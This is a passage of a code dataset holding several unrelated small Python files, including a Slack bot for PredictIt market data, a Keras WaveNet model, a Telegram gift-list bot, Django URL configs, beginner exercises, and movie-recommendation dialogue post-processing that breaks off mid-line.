line.split() #this will split the lines into words\r\n for r in words:\r\n if not r in stop_words:\r\n appendFile = open(outfile, 'a')\r\n # appendFile.write(ps.stem(r) + \" \")\r\n appendFile.write(r + \" \")\r\n appendFile.close()\r\n appendFile = open(outfile, 'a') #write the cleaned data.\r\n appendFile.write(\"\\n\")\r\n appendFile.close()\r\n\r\n","sub_path":"Text_cleaner.py","file_name":"Text_cleaner.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303986666","text":"import os\nimport requests\nimport re\nfrom flask import Flask, request, Response, jsonify\nfrom slackclient import SlackClient\n\napp = Flask(__name__)\n\nSLACK_OAUTH_TOKEN = os.environ['SLACK_OAUTH_TOKEN']\nSLACK_WEBHOOK_TOKEN = os.environ['SLACK_VERIFICATION_TOKEN']\n\nslack = SlackClient(SLACK_OAUTH_TOKEN)\n\npredictit = 'https://www.predictit.org/api/marketdata/all'\ndefault_sort_order = [['LastTradePrice', True]]\n\n# Utility functions\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n# Data transformation\ndef get_markets():\n return requests.get(predictit).json()['Markets']\n\ndef get_contracts():\n return [{k:c[k] for k in c}\n for m in get_markets() for c in m['Contracts']]\n\ndef find_contracts(symbol=''):\n regex = re.compile(\"^.*\" + symbol.upper() + \".*$\")\n return [c for c in get_contracts()\n if regex.match(c['TickerSymbol'])]\n\ndef sort_contracts(contracts, sort_order=default_sort_order):\n return sorted(contracts, key=lambda x: x[sort_order[0][0]],\n reverse=sort_order[0][1])\n\ndef form_chart_url(id):\n return 'https://www.predictit.org/PublicData/GetChartData' + \\\n '?contractIds=' + str(id)+ '×pan=24H'\n\ndef scrape_chart(id):\n return requests.get(form_chart_url(id)).json()\n\ndef append_chart_data(contracts):\n for contract in contracts:\n contract['DailyChartData'] = scrape_chart(contract['ID'])\n return contracts\n\ndef longest_ticker(contracts):\n return max(len(c['TickerSymbol']) for c in contracts)\n\ndef format_price(price):\n return str(int(round(price * 100))\n if is_number(str(price)) else \"--\")\n\ndef format_contracts(contracts):\n max_ticker_len = max(len(c['TickerSymbol']) for c in contracts)\n max_sum_vol_len = max(max(len(str(sum(hr['TradeVolume']\n for hr in c['DailyChartData'])))\n for c in contracts), 3)\n max_1h_vol_len = max(max(len(str(c['DailyChartData'][23]['TradeVolume']))\n for c in contracts), 3)\n max_2h_vol_len = max(max(len(str(c['DailyChartData'][22]['TradeVolume']))\n for c in contracts), 3)\n max_3h_vol_len = max(max(len(str(c['DailyChartData'][21]['TradeVolume']))\n for c in contracts), 3)\n offset = 4\n header = \"la\".ljust(2 + offset) + \\\n \"Symbol\".ljust(max_ticker_len + offset) + \\\n \"Tdy\".rjust(max_sum_vol_len).ljust(max_sum_vol_len + offset - 2) + \\\n \"-1h\".rjust(max_1h_vol_len).ljust(max_1h_vol_len + offset - 2) + \\\n \"-2h\".rjust(max_2h_vol_len).ljust(max_2h_vol_len + offset - 2) + \\\n \"-3h\".rjust(max_3h_vol_len).ljust(max_3h_vol_len + offset) + \\\n \"bY sY\".ljust(5 + offset - 2) + \\\n \"bN sN\".ljust(5 + offset) + \\\n \"Link\"\n border = \"-\" * len(header)\n message = '```' + header + '\\n' + border + '\\n' + '\\n'.join(\n [format_price(c['LastTradePrice']).rjust(2).ljust(2 + offset) +\n c['TickerSymbol'].ljust(max_ticker_len + offset) +\n str(sum(hr['TradeVolume'] for hr in c['DailyChartData']))\n .rjust(max_sum_vol_len).ljust(max_sum_vol_len + offset - 2) +\n str(c['DailyChartData'][23]['TradeVolume'])\n .rjust(max_1h_vol_len).ljust(max_1h_vol_len + offset - 2) +\n str(c['DailyChartData'][22]['TradeVolume'])\n .rjust(max_2h_vol_len).ljust(max_2h_vol_len + offset - 2) +\n str(c['DailyChartData'][21]['TradeVolume'])\n .rjust(max_3h_vol_len).ljust(max_3h_vol_len + offset) +\n (format_price(c['BestBuyYesCost']).rjust(2) + \":\" +\n format_price(c['BestSellYesCost']).ljust(2)).ljust(5 + offset - 2) +\n (format_price(c['BestBuyNoCost']).rjust(2) + \":\" +\n format_price(c['BestSellNoCost']).ljust(2)).ljust(5 + offset) +\n '<' + c['URL'] + '|' + 'Link' + '>'\n for c in contracts]) + '```'\n return message\n\n# Slack methods\ndef post_to_channel(channel, text):\n slack.api_call('chat.postMessage', channel=channel, text=text)\n\ndef receive_slash_command():\n if request.form.get('token') == SLACK_WEBHOOK_TOKEN:\n channel = request.form.get('channel_name')\n username = request.form.get('user_name')\n text = request.form.get('text')\n return {'username': username, 'channel': channel,\n 'text': text}\n\n# General REST API\n@app.route(\"/\")\ndef index():\n return \"

The absolute boy!

\"\n\n# Slackboy REST API\n@app.route('/slackboy/contract', methods=['POST'])\ndef slash_contract():\n if receive_slash_command():\n c = receive_slash_command()\n contracts = format_contracts(append_chart_data(\n sort_contracts(find_contracts(c['text']))))\n post_to_channel(c['channel'], contracts)\n return Response(), 200\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","sub_path":"slackboy.py","file_name":"slackboy.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385986144","text":"# Question 4\n\"\"\"\nResources:\n1. To decern if the input was a string or an integer I had to use try and except.\nI discovered how to use it at the following link. I use this in every other \nexample where this is needed: https://pynative.com/python-check-user-input-is-number-or-string/\n2. Needed a way to print the list nums without brackets, commas or quotes to \nmatch the question. Throung this post: https://www.quora.com/How-can-I-drop-brackets-in-a-Python-list-in-order-to-go-from-1-2-3-to-1-2-3 \non quora I found a way to run a for loop within the print statement to turn\neach element to a string and join them with a space (i.e. \" \").\n\"\"\"\n\"\"\"\nTO DO:\n\"\"\"\n\n# Create prompt to collect input integer as variable.\nnum = input(\"Please enter a positive integer: \")\n# Create list to hold numbers.\nnumsList = []\n\n# Try this code and if no errors run this code.\ntry:\n # Convert input (num) to an integer.\n num = int(num)\n # While the variable num is less then one run this code.\n while num > 1:\n # If num is even.\n if (num % 2 == 0):\n # Devide it by 2.\n num = num / 2\n # Add this number to the list.\n numsList.append(int(num))\n # Else if num is odd.\n elif (num % 2 != 0):\n # Multiple by 3 and add 1.\n num = (num * 3) + 1\n # Add this number to the list.\n numsList.append(int(num))\n # Go through list and print as string and seperate each element with a space (ie \" \")\n print(\" \".join(str(a) for a in numsList))\n\n# If there is an error run this instead.\nexcept ValueError:\n # The error means the input wasn't and integer so print statement.\n print(\"This is not an integer. Please try again.\")","sub_path":"collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209754306","text":"from django.conf.urls import patterns, include, url\n\nfrom . import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name='home'),\n url(r'^find.json$', views.find_json, name='find_json'),\n url(r'^orgs/(?P[A-Za-z0-9_\\-]+)/$',\n views.organization_detail, name='organization_detail'),\n url(r'^orgs/(?P[A-Za-z0-9_\\-]+)/edit/$',\n views.organization_edit, name='organization_edit'),\n\n # Note that this happens to be in sync with the default\n # get_absolute_url() on the User model. If this URL changes,\n # we should set settings.ABSOLUTE_URL_OVERRIDES as per\n # http://stackoverflow.com/a/2328856.\n url(r'^users/(?P[A-Za-z0-9_@+.\\-]+)/$',\n views.user_detail, name='user_detail'),\n\n url(r'^accounts/profile/$', views.user_edit, name='user_edit'),\n)\n","sub_path":"directory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142065548","text":"from random import randint\n\nx = randint(0, 10)\n#print(x)\nacerto = 0\ni = 0\n\nwhile acerto == 0:\n y = int(input('Adivinhe um numero de 0 a 10: '))\n i += 1\n if x == y:\n acerto = 1\n else:\n if x > y:\n print('Mais. Tente novamente.')\n else:\n print('Menos. Tente novamente.')\nif i == 1:\n print('Acertou de primeira.')\nelse:\n print('Acertou. Foram necessarios {} palpites para vencer.'.format(i))\n","sub_path":"CursoemVideo/ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114774925","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^logout$', views.logout),\n\turl(r'^remove/(?P\\d+)$', views.remove),\n\turl(r'^addexisting/(?P\\d+)$', views.addexisting),\n\t# url(r'^delete/(?P\\d+)$', views.delete),\n\turl(r'^view/(?P\\d+)$', views.view),\n\turl(r'^add$', views.add),\n\turl(r'^additem$', views.additem),\n\turl(r'^addtoWish$', views.addtoWish, name='addWish'),\n]","sub_path":"apps/black/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627238872","text":"from keras.models import Model\nfrom keras.layers import Input, Conv1D, Dense, Activation, Dropout, Lambda, Multiply, Add, Concatenate, Reshape, TimeDistributed\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras import regularizers\n\n\ndef root_mean_squared_error(y_true, y_pred):\n return K.sqrt(K.mean(K.square(y_pred - y_true)))\n\n\n\n#import predict size\ndef wavenet_model(predict_size, learning_rate, num_layers, stacks, dropout, input_size, n_filters):\n\n # convolutional operation parameters\n filter_width = 2 # considers the relation between two data points\n n_filters # capture X different properties of the data\n cond_in_channels= n_filters *(input_size-1) #keep\n residual_channels= n_filters *2 # has to be the same as gate channels ,for convolution at the beginning of residual block\n gate_channels= n_filters *2\n skip_channels= n_filters #no of filters at the skip connection\n out_channels= n_filters # no of filters a the penultimate convolution, last convolution is 1x1\n dilation_rates = [2 ** i for i in range(num_layers)]\n\n #input is a sort of input layer\n # define an input history series and pass it through a stack of dilated causal convolution blocks.\n initialiser= 'glorot_uniform' #or he_uniform for kaimain intialisation\n\n\n history_seq = Input(shape=(None, input_size)) #\n\n\n x = Lambda(lambda x: x[:, :, 0:1] )(history_seq) #this selects only the first feature\n\n ## x = Conv1D(x_in_channels, 1, kernel_initializer=initialiser, padding='same', activation='relu')(x) #not used\n\n if input_size>1:\n c= Lambda(lambda x: x[:, :, 1:])(history_seq)\n c_conv = Conv1D(cond_in_channels, 1, kernel_initializer=initialiser, padding='same', activation='relu')(c) # convolution on input conditional input, sort of pre-processing\n\n skips = []\n for dilation_rate in dilation_rates:\n\n # preprocessing - equivalent to time-distributed dense\n x = Conv1D(residual_channels, 1, kernel_initializer= initialiser,padding='same', activation='relu')(x)\n\n #no of filters here is g_channels\n x_dil_conv = Conv1D(filters=gate_channels,\n kernel_size=filter_width,kernel_initializer= initialiser,\n padding='causal',\n dilation_rate=dilation_rate)(x)\n\n if input_size >1 and dilation_rate==1:\n\n c_conv = Conv1D(gate_channels, filter_width, padding='causal')(c_conv) #g -gates\n tanh_gate= Add()([x_dil_conv, c_conv])\n sigm_gate = Add()([x_dil_conv, c_conv])\n\n else:\n tanh_gate = x_dil_conv\n sigm_gate = x_dil_conv\n\n\n #multiply filter and gating branches\n z = Multiply()([Activation('tanh')(tanh_gate),\n Activation('sigmoid')(sigm_gate)])\n\n # postprocessing - equivalent to time-distributed dense\n s = Conv1D(skip_channels, 1, padding='same', kernel_initializer= initialiser,activation='relu')(z)\n z = Conv1D(residual_channels, 1, padding='same',kernel_initializer= initialiser, activation='relu')(z)\n\n # residual connection used as input in next dilation\n x = Add()([x_dil_conv, z])\n\n # collect skip connections for final output\n skips.append(s)\n\n # add all skip connection outputs\n out = Activation('relu')(Add()(skips))\n\n # final time-distributed dense layers\n out = Conv1D(out_channels, 3, kernel_initializer= initialiser,padding='causal')(out) #is kernel size 1 in traditional setup #was 3\n out = Activation('relu')(out)\n\n out = Activation('relu')(out)\n out = Dropout(dropout)(out)\n\n out = Conv1D(1, 1, kernel_initializer= initialiser, padding='same')(out) #out shape [B, S, F] same no of samples as training seq\n\n\n pred_seq_train = Lambda(lambda x: x[:, :, :])(out)\n receptive_field_size= ((sum(dilation_rates) * stacks) * (filter_width - 1)) + 1\n print('Receptive fiels is : ', receptive_field_size)\n\n model = Model(history_seq, pred_seq_train) #input, output\n model.compile(Adam(learning_rate=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),\n loss=root_mean_squared_error)\n\n return model\n\n","sub_path":"wavenet_model_keras.py","file_name":"wavenet_model_keras.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454150959","text":"from main import bot, dp\nfrom aiogram.types import Message\nfrom config import admin_id\nfrom aiogram.dispatcher.storage import FSMContext\nfrom states import ChooseMode, CurrentLists\nfrom CurrentList import default_list, CurrentList\n\nSTART_MESSAGE = \"Бот запущен\"\ncurrent_list_key = 'current_list'\n\n\nasync def send_to_admin(*args):\n await bot.send_message(chat_id=admin_id, text=START_MESSAGE)\n\n\n@dp.message_handler(commands=[\"my_list\"])\nasync def show_list(message: Message, state: FSMContext):\n data = await state.get_data()\n current_list = data.get(current_list_key)\n if current_list is None:\n current_list = default_list\n await state.update_data(current_list=current_list)\n await message.answer(str(current_list))\n await CurrentLists.Show.set()\n\n\n@dp.message_handler(state=CurrentLists.Show, commands=[\"add\"])\nasync def add_item_request(message: Message):\n text = f\"Введите название подарка\"\n await message.answer(text)\n await CurrentLists.AddItem.set()\n\n\n@dp.message_handler(state=CurrentLists.AddItem)\nasync def add_item(message: Message, state: FSMContext):\n data = await state.get_data()\n current_list = data[current_list_key]\n current_list.add_item(message.text)\n await state.update_data(current_list=current_list)\n await message.answer(data[current_list_key])\n await CurrentLists.Show.set()\n\n\n@dp.message_handler(state=CurrentLists.Show, commands=[\"remove\"])\nasync def remove_item_request(message: Message):\n text = f\"Введите номер подарка\"\n await message.answer(text)\n await CurrentLists.RemoveItem.set()\n\n\n@dp.message_handler(state=CurrentLists.RemoveItem)\nasync def remove_item(message: Message, state: FSMContext):\n data = await state.get_data()\n current_list = data[current_list_key]\n current_list.remove_item(int(message.text))\n await state.update_data(current_list=current_list)\n await message.answer(data[current_list_key])\n await CurrentLists.Show.set()\n\n","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319015818","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\n\n\nclass SignUpView(TemplateView):\n template_name = 'registration/signup.html'\n\n\ndef index(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_instructor:\n\t\t\treturn redirect('instructors:topic_change_list')\n\t\telse:\n\t\t\treturn redirect('students:topic_list')\n\treturn render(request, 'codecat/index.html')\n","sub_path":"codecat/views/codecat.py","file_name":"codecat.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73718247","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nimport tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.nn.utils.rnn import pad_sequence\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer, GPT2Config\nfrom transformers import BertTokenizer\nimport random\nimport os\nimport nltk\nimport collections\nimport string\nimport json, requests\nimport re\n\nimport json\nimport requests\nfrom urllib.request import urlopen\nimport string\nimport pandas as pd\n\nimport numpy as np\nimport pickle\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\nimport pickle\nimport string \n\n\ndef top_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):\n \"\"\" Filter a distribution of logits using top-k, top-p (nucleus) and/or threshold filtering\n Args:\n logits: logits distribution shape (vocabulary size)\n top_k: <=0: no filtering, >0: keep only top k tokens with highest probability.\n top_p: <=0.0: no filtering, >0.0: keep only a subset S of candidates, where S is the smallest subset\n whose total probability mass is greater than or equal to the threshold top_p.\n In practice, we select the highest probability tokens whose cumulative probability mass exceeds\n the threshold top_p.\n \"\"\"\n # batch support!\n if top_k > 0:\n values, _ = torch.topk(logits, top_k)\n min_values = values[:, -1].unsqueeze(1).repeat(1, logits.shape[-1])\n logits = torch.where(logits < min_values, \n torch.ones_like(logits, dtype=logits.dtype) * -float('Inf'), \n logits)\n if top_p > 0.0:\n # Compute cumulative probabilities of sorted tokens\n sorted_logits, sorted_indices = torch.sort(logits, descending=True)\n cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)\n\n # Remove tokens with cumulative probability above the threshold\n sorted_indices_to_remove = cumulative_probabilities > top_p\n # Shift the indices to the right to keep also the first token above the threshold\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = 0\n \n sorted_logits = sorted_logits.masked_fill_(sorted_indices_to_remove, filter_value)\n logits = torch.zeros_like(logits).scatter(1, sorted_indices, sorted_logits)\n \n return logits\n\ndef nGramBlock(sent, n):\n duplication = False\n tokens = sent\n ngram_list = []\n for i in range(len(tokens)-n + 1):\n ngram_list.append(tuple(tokens[i: i+n]))\n ngram_set = set(ngram_list)\n if len(ngram_set) != len(ngram_list):\n duplication = True\n return duplication\n\n\ndef preprocess(text):\n\tnew_text = text.lower()\n\tpunctuations = set(string.punctuation)\n\treturned_text = \"\"\n\tfor idx in range(len(new_text)):\n\t\tchars = new_text[idx]\n\t\tif chars in punctuations:\n\t\t\tif idx-1 >= 0 and idx+1 < len(new_text):\n\t\t\t\tif new_text[idx-1].isalpha() and new_text[idx+1].isalpha():\n\t\t\t\t\treturned_text += new_text[idx]\n\t\telse:\n\t\t\t\n\t\t\treturned_text += new_text[idx]\n\treturn returned_text\n\ngenre_dict = {'humor': 'comedy', 'science': 'sci-fi', 'animation': 'animation', 'animations': 'animation', 'animated': 'animation', 'comedy': 'comedy', 'comedies': 'comedy', 'funny': 'comedy', 'crime': 'crime', 'crimes': 'crime', 'thriller': 'thriller', 'thrillers': 'thriller', 'mystery': 'mystery', 'mysteries': 'mystery', 'musical': 'musical', 'biography': 'biography', 'biographies': 'biography', 'history': 'history', 'histories': 'history', 'romance': 'romance', 'romantic': 'romance', 'romantic': 'romance', 'sport': 'sport', 'western': 'western', 'documentary': 'documentary', 'documentaries': 'documentary', 'news': 'news', 'horror': 'horror', 'horrors': 'horror', 'scify': 'sci-fi', 'sci': 'sci-fi', 'scifi': 'sci-fi', 'sci fy': 'sci-fi', 'sci-fi': 'sci-fi', 'science fiction': 'sci-fi', 'super hero': 'action', 'superhero': 'action', 'adventure': 'adventure', 'drama':'drama', 'dramas': 'drama', 'family': 'family', 'war':'war', 'fantasy':'fantasy', 'action':'action'}\ndef label_genre(input_text, genres):\n\tnew_text = []\n\tthe_list = input_text.split(\" \")\n\tidx_list = []\n\tfor idx, token in enumerate(the_list):\n\t\tthe_token = preprocess(token)\n\t\tif the_token in genre_dict:\n\t\t\tif the_token == \"family\" or the_token == \"war\" or the_token == \"funny\" or the_token ==\"mystery\" or the_token ==\"animated\" or the_token ==\"romantic\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"movie\" in next_token:\n\t\t\t\t\t\treal_genre = genre_dict[preprocess(token)]\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telif the_token == \"science\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"fiction\" in next_token:\n\t\t\t\t\t\treal_genre = \"sci-fi\"\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telif the_token == \"sci\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"fi\" in next_token or \"fy\" in next_token:\n\t\t\t\t\t\treal_genre = \"sci-fi\"\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telif the_token == \"humor\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"genre\" in next_token:\n\t\t\t\t\t\treal_genre = \"comedy\"\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telse:\t\t\t\t\t\t\n\t\t\t\treal_genre = genre_dict[preprocess(token)]\n\t\t\t\tif real_genre not in genres:\n\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\tidx_list.append(real_genre)\n\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\telse:\n\t\t\t new_text.append(token)\n\treturned_text = \" \".join(new_text)\n\tif idx_list == []:\n\t\treturned_text = input_text\n\treturn returned_text, genres, idx_list\n\ndef add_SEP(text, idx_list, case=\"genre\"):\n if \"[SEP]\" not in text:\n text = text + \" [SEP] \"\n text += case + \": \" + \", \".join(idx_list)\n return text+\";\"\n\ndef remove_duplicate_movie_plots(text):\n text = text.replace(\"by [MOVIE_P_DIRECTOR\", \"with [MOVIE_P_ACTOR\")\n text = text.replace(\"P_DIRECTOR\", \"P_ACTOR\")\n if debug_print:\n print(\"Before remove duplication: \" + text)\n split_by_movie_plot = text.split(\"[MOVIE_PLOT]\")\n if len(split_by_movie_plot) > 2:\n #remove the second plot\n mv_plot_counter = 0\n temp_list = []\n first = split_by_movie_plot[0].strip() + \" [MOVIE_PLOT] \"\n second = split_by_movie_plot[1].strip()\n #process second\n remove_last = second.split(\"<\")\n second = \"<\".join(remove_last[:len(remove_last)-1])\n return (first + second).strip()\n else:\n return text\n\ndef convert_back(text, the_dict, proposed_result, case=\"GENRE\", template_movie=None, template_genre=\"action\"):\n\n if debug_print:\n print(\"orig: \" + text)\n if \"\" in text:\n the_text_list = text.split(\"\")\n text_result = []\n for idx, element in enumerate(the_text_list):\n if idx == 0:\n if element != \"\":\n text_result.append(element)\n else:\n other_text = element.split(\"<\")\n with_credibility = other_text[0]\n \n rest_of_text = \"<\".join(other_text[1:])\n tokenized_cred = with_credibility.split(\" \")\n\n if len(tokenized_cred) < 15:\n text_result.append(with_credibility)\n if rest_of_text != \"\":\n rest_of_text = \"<\"+rest_of_text\n text_result.append(rest_of_text)\n \n if debug_print:\n print(\"rest of text: \" + rest_of_text)\n \n if text_result != []:\n text = \"\"\n for component in text_result:\n component = component.strip()\n if component[0] != \"<\":\n component = \"\"+component\n else:\n component += \"The plot is like this: [MOVIE_PLOT]\" #updated here\n text += component + \" \"\n text = text.strip()\n else:\n text = \"The plot is like this: [MOVIE_PLOT]\"\n\n if debug_print:\n print(\"processed credibility: \" + text)\n orig = text.split(\"[SEP]\")\n text = orig[0].strip()\n \n# text = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', ' ', text).strip()\n text = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', '[TEMP_SPLIT]', text).strip()\n temp_sentences = text.split(\"[TEMP_SPLIT]\")\n the_sentences = []\n for temp_sent in temp_sentences:\n tokenized_temp = temp_sent.strip().split(\" \")\n last_token = tokenized_temp[len(tokenized_temp)-1].strip()\n\n if \"[MOVIE_\" in last_token and last_token[len(last_token)-1] == \"]\":\n if \"did\" in tokenized_temp[0].lower() or \"do\" in tokenized_temp[0].lower() or \"have\" in tokenized_temp[0].lower() or \"who\" in tokenized_temp[0].lower() or \"what\" in tokenized_temp[0].lower() or \"how\" in tokenized_temp[0].lower():\n tokenized_temp[len(tokenized_temp)-1] += \" ?\"\n else:\n if \"[MOVIE_PLOT]\" not in tokenized_temp[len(tokenized_temp) -1]:\n tokenized_temp[len(tokenized_temp)-1] += \" .\"\n joined_tokens = \" \".join(tokenized_temp)\n the_sentences.append(joined_tokens)\n \n text = \" \".join(the_sentences)\n if debug_print:\n print(\"TEXT: \" + text)\n \n new_text = []\n tokenized_text = text.split(\" \")\n placeholder_id_to_text = {y:x for x,y in the_dict.items()}\n if debug_print:\n print(placeholder_id_to_text)\n i = 0\n mentioned_movie = \"\"\n has_the_word_and = False\n taken_idx = {}\n for token in tokenized_text:\n if \"[MOVIE_\"+case+\"_\" in token or (case == \"TITLE\" and \"TITLE\" in token):\n the_tokens = token.split(\"[MOVIE_\")\n if debug_print:\n print(\"the tokens: \" + str(the_tokens))\n for more_token in the_tokens:\n if case+\"_\" in more_token:\n ending = more_token.split(\"]\")\n for ttoken in ending:\n if case+\"_\" in ttoken:\n index_old = ttoken.split(\"_\")[1]\n\n new_idx = \"\"\n for chars in index_old:\n if chars != \"]\":\n new_idx += chars\n else:\n break\n new_idx = int(new_idx)\n\n if new_idx in placeholder_id_to_text:\n \n if has_the_word_and and new_idx +1 in placeholder_id_to_text:\n new_idx = new_idx + 1\n real_word = placeholder_id_to_text[new_idx]\n \n \n taken_idx[new_idx] = True\n else:\n if i < len(proposed_result):\n real_word = proposed_result[i]\n i += 1\n else:\n if case==\"GENRE\":\n real_word = template_genre\n elif case == \"TITLE\":\n if proposed_result == []:\n real_word = template_movie\n mentioned_movie = real_word\n else:\n real_word = proposed_result[i]\n mentioned_movie = real_word\n i += 1\n if real_word not in the_dict:\n the_dict[real_word] = len(the_dict)\n# i += 1\n if real_word != \"\":\n if case == \"TITLE\":\n \n split_real_word = real_word.strip().split(\" \")\n no_year = split_real_word[:len(split_real_word)-1]\n if debug_print:\n print(\"test new idx: no year\" + (\" \".join(no_year)).strip())\n new_text.append((\" \".join(no_year)).strip())\n mentioned_movie = real_word\n else:\n if real_word == \"family\" or real_word == \"war\":\n real_word += \" movies\"\n new_text.append(real_word.strip())\n mentioned_movie = real_word.strip() #it's actually genre here\n \n else:\n if ttoken != \"\":\n new_text.append(ttoken.strip())\n if ttoken == \"and\":\n has_the_word_and =True\n else:\n if more_token != \"\":\n new_text.append(more_token.strip())\n else:\n new_text.append(token.strip())\n \n \n result_text = \" \".join(new_text)\n if mentioned_movie != \"\":\n if case == \"TITLE\":\n movie_no_year_split = mentioned_movie.split(\" \")\n movie_no_year = \" \".join(movie_no_year_split[:len(movie_no_year_split)-1])\n else:\n movie_no_year = mentioned_movie\n\n fix_period_or_question_mark = result_text.split(movie_no_year)\n temp_list = []\n for text in fix_period_or_question_mark:\n clean_text = text.strip()\n if len(clean_text) >= 1 and clean_text[0] not in set(string.punctuation):\n clean_text = \" \"+clean_text\n temp_list.append(clean_text)\n result_text = (\" \" +movie_no_year).join(temp_list)\n\n return result_text, the_dict, mentioned_movie\n\ndef force_rec(text, the_dict, proposed_result, template_movie=None):\n if debug_print:\n print(\"FORC REC orig: \" + text)\n text = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', ' ', text).strip()\n orig = text.split(\"[SEP]\")\n text = orig[0].strip()\n new_text = []\n tokenized_text = text.split(\" \")\n placeholder_id_to_text = {y:x for x,y in the_dict.items()}\n if debug_print:\n print(placeholder_id_to_text)\n i = 0\n template_genre = \"action\"\n mentioned_movie = \"\"\n for token in tokenized_text:\n if \"TITLE_\" in token:\n the_tokens = token.split(\"[MOVIE_\")\n if debug_print:\n print(\"the tokens: \" + str(the_tokens))\n for more_token in the_tokens:\n if \"TITLE_\" in more_token:\n ending = more_token.split(\"]\")\n for ttoken in ending:\n if \"TITLE_\" in ttoken:\n real_word = template_movie\n if i < len(proposed_result):\n if proposed_result[i] not in the_dict:\n if debug_print:\n print(\"Force rec: \" + proposed_result[i])\n real_word = proposed_result[i]\n i += 1\n else:\n i +=1\n else:\n real_word = template_movie\n \n mentioned_movie = real_word\n if real_word not in the_dict:\n the_dict[real_word] = len(the_dict)\n\n if real_word != \"\":\n split_real_word = real_word.split(\" \")\n no_year = \" \".join(split_real_word[:len(split_real_word)-1])\n new_text.append(no_year.strip())\n else:\n real_word = template_movie\n new_text.append(real_word.strip())\n else:\n if ttoken != \"\":\n new_text.append(ttoken.strip())\n else:\n if more_token != \"\":\n new_text.append(more_token.strip())\n else:\n new_text.append(token.strip())\n \n result_text = \" \".join(new_text)\n if mentioned_movie != \"\":\n \n movie_no_year_split = mentioned_movie.split(\" \")\n movie_no_year = \" \".join(movie_no_year_split[:len(movie_no_year_split)-1])\n\n fix_period_or_question_mark = result_text.split(movie_no_year)\n temp_list = []\n for text in fix_period_or_question_mark:\n clean_text = text.strip()\n if len(clean_text) >= 1 and clean_text[0] not in set(string.punctuation):\n clean_text = \" \"+clean_text\n temp_list.append(clean_text)\n\n result_text = (\" \" 